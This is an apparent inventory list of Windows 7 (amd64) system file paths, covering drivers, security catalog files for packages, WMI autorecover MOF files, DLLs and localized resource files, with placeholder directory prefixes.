- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MediaCenter-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <DRIVERS>\sffdisk.sys
- <DRIVERS>\sffp_mmc.sys
- <DRIVERS>\sffp_sd.sys
- <SYSTEM32>\wbem\autorecover\26869dc91cc97fbae032bea74b1f7ab8.mof
- <DRIVERS>\sfloppy.sys
- <DRIVERS>\sisraid2.sys
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MediaCenter-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <DRIVERS>\sisraid4.sys
- <DRIVERS>\smb.sys
- <DRIVERS>\smclib.sys
- <SYSTEM32>\wbem\autorecover\26a5a04a346330e389400293e01228ac.mof
- <SYSTEM32>\wbem\autorecover\26c097a9392f8c541ad42e89b7909073.mof
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MediaCenter-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <DRIVERS>\spldr.sys
- <DRIVERS>\spsys.sys
- <DRIVERS>\srv.sys
- <DRIVERS>\srv2.sys
- <DRIVERS>\srvnet.sys
- <DRIVERS>\stexstor.sys
- <DRIVERS>\storport.sys
- <DRIVERS>\storvsc.sys
- <DRIVERS>\stream.sys
- <DRIVERS>\swenum.sys
- <DRIVERS>\synth3dvsc.sys
- <DRIVERS>\tape.sys
- <DRIVERS>\tcpip.sys
- <DRIVERS>\tcpipreg.sys
- <DRIVERS>\tdi.sys
- <SYSTEM32>\wbem\autorecover\2713ef0312125b926ec10d64c17dc18a.mof
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MediaCenter-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MediaPlayback-OC-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MediaPlayback-OC-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MediaPlayback-OC-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MediaPlayback-OC-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MediaPlayer-DVDRegistration-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MediaPlayer-DVDRegistration-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MediaPlayer-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <DRIVERS>\tdpipe.sys
- <DRIVERS>\tdtcp.sys
- <DRIVERS>\tdx.sys
- <DRIVERS>\termdd.sys
- <DRIVERS>\terminpt.sys
- <DRIVERS>\tssecsrv.sys
- <DRIVERS>\tsusbflt.sys
- <SYSTEM32>\cpfilters.dll
- <SYSTEM32>\credssp.dll
- <SYSTEM32>\credui.dll
- <SYSTEM32>\credwiz.exe
- <SYSTEM32>\crppresentation.dll
- <SYSTEM32>\crypt32.dll
- <SYSTEM32>\cryptbase.dll
- <SYSTEM32>\cryptdlg.dll
- <SYSTEM32>\cryptdll.dll
- <SYSTEM32>\cryptext.dll
- <SYSTEM32>\cryptnet.dll
- <SYSTEM32>\cryptsp.dll
- <SYSTEM32>\cryptsvc.dll
- <SYSTEM32>\cryptui.dll
- <SYSTEM32>\cryptxml.dll
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MediaPlayer-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MediaPlayer-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\wbem\autorecover\27e74c9d8c27fc46ec68c031740ded33.mof
- <DRIVERS>\tsusbgd.sys
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MediaPlayer-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\cs-cz\cdosys.dll.mui
- <SYSTEM32>\cs-cz\comctl32.dll.mui
- <SYSTEM32>\cs-cz\comdlg32.dll.mui
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-Basic-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\cs-cz\fms.dll.mui
- <SYSTEM32>\wbem\autorecover\28023f2310ff239bf1addb2ffb2355fd.mof
- <DRIVERS>\tsusbhub.sys
- <SYSTEM32>\wbem\autorecover\28339c8fecce2a7e9c1e3fac5cb09394.mof
- <SYSTEM32>\wbem\autorecover\2a05e3f4c9132fdf73bb3d12f6886f31.mof
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-Basic-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\cs-cz\mlang.dll.mui
- <SYSTEM32>\wbem\autorecover\2a981f6f5e91f392e32b2b96619ee23c.mof
- <DRIVERS>\tunnel.sys
- <SYSTEM32>\cs-cz\msimsg.dll.mui
- <SYSTEM32>\cs-cz\msprivs.dll.mui
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-Basic-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\wbem\autorecover\2aa23bb86a5ebd8bc2d820944e55b233.mof
- <SYSTEM32>\cscapi.dll
- <SYSTEM32>\cscdll.dll
- <SYSTEM32>\cscmig.dll
- <SYSTEM32>\cscobj.dll
- <SYSTEM32>\wbem\autorecover\2b865b044338ff46fea9c0b03a858fed.mof
- <SYSTEM32>\cscript.exe
- <SYSTEM32>\cscsvc.dll
- <SYSTEM32>\cscui.dll
- <SYSTEM32>\csrr.rs
- <SYSTEM32>\csrsrv.dll
- <SYSTEM32>\csrss.exe
- <SYSTEM32>\ctfmon.exe
- <SYSTEM32>\cttune.exe
- <SYSTEM32>\cttunesvr.exe
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-Basic-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-LocationBasic-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-LocationBasic-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-LocationBasic-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-LocationBasic-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-Premium-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-Premium-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <DRIVERS>\uagp35.sys
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-Premium-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\c_037.nls
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-Premium-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <DRIVERS>\udfs.sys
- <DRIVERS>\uliagpkx.sys
- <SYSTEM32>\wbem\autorecover\2b929bb410b7d536bf0a8c3124758fb3.mof
- <DRIVERS>\umbus.sys
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-Sensors-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-Sensors-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-Sensors-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\wbem\autorecover\2c142c4c15e3b8d139b98154cd083071.mof
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-Sensors-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-SideShow-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-SideShow-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-SideShow-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MobilePC-Client-SideShow-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MSMQ-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MSMQ-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MSMQ-Client-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-MSMQ-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\c_10000.nls
- <DRIVERS>\umdf\en-us\wpdmtpdr.dll.mui
- <DRIVERS>\umdf\en-us\wudfusbcciddriver.dll.mui
- <DRIVERS>\umdf\usbdr.dll
- <DRIVERS>\umdf\wpdfs.dll
- <DRIVERS>\umpass.sys
- <DRIVERS>\usb8023.sys
- <DRIVERS>\usbcamd2.sys
- <DRIVERS>\usbccgp.sys
- <DRIVERS>\usbcir.sys
- <DRIVERS>\usbd.sys
- <DRIVERS>\usbehci.sys
- <DRIVERS>\usbhub.sys
- <DRIVERS>\usbohci.sys
- <DRIVERS>\usbport.sys
- <DRIVERS>\usbprint.sys
- <DRIVERS>\usbrpm.sys
- <DRIVERS>\usbstor.sys
- <DRIVERS>\usbuhci.sys
- <DRIVERS>\vdrvroot.sys
- <DRIVERS>\vga.sys
- <DRIVERS>\vgapnp.sys
- <DRIVERS>\vhdmp.sys
- <DRIVERS>\viaide.sys
- <DRIVERS>\videoprt.sys
- <DRIVERS>\vmbus.sys
- <DRIVERS>\vmbushid.sys
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-NetFx3-OC-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-NetFx3-OC-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-NetFx3-OC-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-NetFx3-OC-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-NetworkDiagnostics-DirectAccessEntry-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-NetworkDiagnostics-DirectAccessEntry-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-NFS-ClientSKU-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-NFS-ClientSKU-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-NFS-ClientSKU-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-NFS-ClientSKU-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <DRIVERS>\vms3cap.sys
- <DRIVERS>\vmstorfl.sys
- <DRIVERS>\volmgr.sys
- <DRIVERS>\volmgrx.sys
- <DRIVERS>\volsnap.sys
- <DRIVERS>\vsmraid.sys
- <DRIVERS>\vwifibus.sys
- <DRIVERS>\vwififlt.sys
- <DRIVERS>\vwifimp.sys
- <DRIVERS>\wacompen.sys
- <DRIVERS>\wanarp.sys
- <DRIVERS>\watchdog.sys
- <DRIVERS>\wd.sys
- <DRIVERS>\wdf01000.sys
- <DRIVERS>\wdfldr.sys
- <DRIVERS>\wfplwf.sys
- <DRIVERS>\wimmount.sys
- <DRIVERS>\winhv.sys
- <DRIVERS>\wmiacpi.sys
- <DRIVERS>\wmilib.sys
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-OfflineFiles-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\wbem\autorecover\2c77f885b38b7fdf35b22fbd13e5a057.mof
- <DRIVERS>\ws2ifsl.sys
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-OfflineFiles-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-OfflineFiles-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\wbem\autorecover\2ce523184a801aa7361a7039e2d6b41d.mof
- <SYSTEM32>\wbem\autorecover\2cfb5b149fa396d1aea5f89b1c5a8d81.mof
- <SYSTEM32>\wbem\autorecover\2dc82df4bf8a12e8a3215855a2b9c285.mof
- <SYSTEM32>\wbem\autorecover\2e98024d064b40f18c4798f663208969.mof
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-OfflineFiles-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <DRIVERS>\wudfpf.sys
- <DRIVERS>\wudfrd.sys
- <SYSTEM32>\wbem\autorecover\2f2ce73377d6a870c802dee0363015c2.mof
- <SYSTEM32>\wbem\autorecover\2f53e12b527e427d98ee54896279ff4e.mof
- <SYSTEM32>\wbem\autorecover\2f78fc8b4be50af6f199cb788e397e5e.mof
- <SYSTEM32>\wbem\autorecover\321f79808e7c79bd91941c94e53929eb.mof
- <SYSTEM32>\wbem\autorecover\327bb52c3180f103242f79f3fb946560.mof
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-OpticalMediaDisc-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-OpticalMediaDisc-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-OpticalMediaDisc-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-OpticalMediaDisc-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ParentalControls-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ParentalControls-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ParentalControls-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ParentalControls-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-PeerDist-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-PeerDist-Client-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-PeerDist-Client-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-PeerDist-Client-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-PeerToPeer-Full-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-PeerToPeer-Full-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-PeerToPeer-Full-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-PeerToPeer-Full-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Personalization-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Personalization-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-PhotoBasicPackage~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-PhotoBasicPackage~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-PhotoBasicPackage~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-PhotoBasicPackage~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-PhotoPremiumPackage~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-PhotoPremiumPackage~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-PhotoPremiumPackage~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-PhotoPremiumPackage~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printer-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\wbem\autorecover\32c943873cc624333bd0bf2a77384240.mof
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printer-Drivers-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printer-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\wbem\autorecover\341285245f81aa74fe6654017e06c685.mof
- <SYSTEM32>\wbem\autorecover\3671daf5404a1fbab76ef8792000b4ea.mof
- <SYSTEM32>\wbem\autorecover\37134956f76d3c30c9be0c12571caf43.mof
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printer-Drivers-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-Foundation-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-Foundation-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-Foundation-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-Foundation-Starter-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-Foundation-Starter-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-Foundation-Starter-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-Foundation-Starter-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-LocalPrinting-Enterprise-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-LocalPrinting-Enterprise-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-LocalPrinting-Home-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-LocalPrinting-Home-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-PremiumTools-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-PremiumTools-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-PremiumTools-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-PremiumTools-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-XPSServices-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-XPSServices-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-XPSServices-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Printing-XPSServices-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ProfessionalEdition-wrapper~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ProfessionalEdition~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-ProfessionalEdition~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RasRip-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RasRip-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RasRip-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RasRip-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RDC-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RDC-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RDC-Package~31bf3856ad364e35~amd64~~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RDC-Package~31bf3856ad364e35~amd64~~6.1.7601.17514.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RecDisc-SDP-Package~31bf3856ad364e35~amd64~en-US~6.1.7600.16385.cat
- <SYSTEM32>\catroot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-RecDisc-SDP-Package~31bf3856ad364e35~amd64~en-US~6.1.7601.17514.cat
